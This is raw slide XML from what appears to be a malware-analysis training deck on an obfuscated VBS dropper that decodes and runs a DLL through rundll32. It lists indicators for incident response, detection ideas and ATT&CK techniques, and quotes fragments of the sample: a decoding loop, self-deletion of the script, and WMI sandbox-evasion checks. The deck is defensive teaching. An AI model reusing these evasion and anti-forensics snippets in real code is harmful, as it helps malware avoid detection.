              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	GewqX("DEBUG: F_RUN_T - True")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486" name="Shape 486"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p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 Nesting Dolls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5549000" y="1152475"/>
            <a:ext cx="3283200" cy="34164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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The inner-most doll would be the DLL payload.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The VBS encodes the DLL payload, obfuscating it into something unrecognizable.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Each function of the VBS is further encoded into something unrecognizable (the arrays of integer values).</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Google Shape;489;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152474"/>
            <a:ext cx="5172200" cy="387915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493" name="Shape 493"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494;p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 Incident Response Team</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495;p8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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To the Incident Response Team, Containment info:</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File Creation:  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%TMP%\racial.drc</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%TMP%\adobe.url</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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Process Creation:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rundll32 %TMP%\racial.drc, DllRegisterServer</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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The error message – have any of the users seen it?</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822400" y="3158663"/>
            <a:ext cx="4495800" cy="1514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we get a different File Hash on each run?</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for myArrayAddress = myArrayStart to myArrayEnd</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Randomize</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>if myInput(myArrayAddress) = 999999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then</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myReturnValue = myReturnValue &amp; ChrW(Int((myOne-myNine+1)*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Rnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+myNine))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Else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myReturnValue = myReturnValue &amp; ChrW(myInput(myArrayAddress) - 7)</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End if</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Next</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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500" name="Shape 500"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501;p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 Threat Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p8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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can we detect?</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rundll32.exe…. does that usually run on files with ".drc" extension?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rundll32 %TMP%\racial.drc, DllRegisterServer</a:t>
            </a:r>
            <a:endParaRPr sz="1700">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rundll32.exe…. should it be running on files from %TMP%?</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Process Ancestry:  The VBS file should be executed by wscript.exe or cscript.exe</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The VBS file then runs rundll32.exe.  How common is it that a process ancestry includes:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wscript.exe AND rundll32.exe?</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cscript.exe AND rundll32.exe?</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(I don't know - you'd want to hunt this in a production environment to determine if this is feasible.)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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506" name="Shape 506"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507;p8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 Threat Intel - TTPs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p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rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T1204.002 - User Execution: Malicious file.  The victim must run the VBS file</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T1059.005 - Visual Basic - The malware sample is a VBS file that drops a malicious DLL file which is executed by rundll32.exe.  Also used to:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KstO.createShortcut(sandhill + "adobe.url")  ← Create a shortcut file</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WScript.Quit  ← end the VBS script</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awry.DeleteFile WScript.ScriptFullName, True ← delete the VBS file (evidence)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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512" name="Shape 512"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="Google Shape;513;p8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 Threat Intel - Execution, continued</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p8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rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T1047 - Windows Management Instrumentation - Several WMI queries were used to gather information on the victim host:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select * from Win32_LogicalDisk ← Check for a host with a hard drive smaller than 50 GB</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select * from Win32_Processor ← Check for a host with less than 3 processors</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select * from Win32_ComputerSystem ← Check for a host with less than 1030 MB of physical memory</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select * from Win32_Process ← Check the host for:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Less than 28 running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processes with file names used in malware analysis</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Win32_OperatingSystem ← Check when the host was last booted</a:t>
            </a:r>
            <a:endParaRPr sz="160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518" name="Shape 518"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p8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 Threat Intel continued</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Google Shape;520;p8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Defense Evasion</a:t>
            </a:r>
            <a:endParaRPr>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T1480 - Execution Guardrails</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
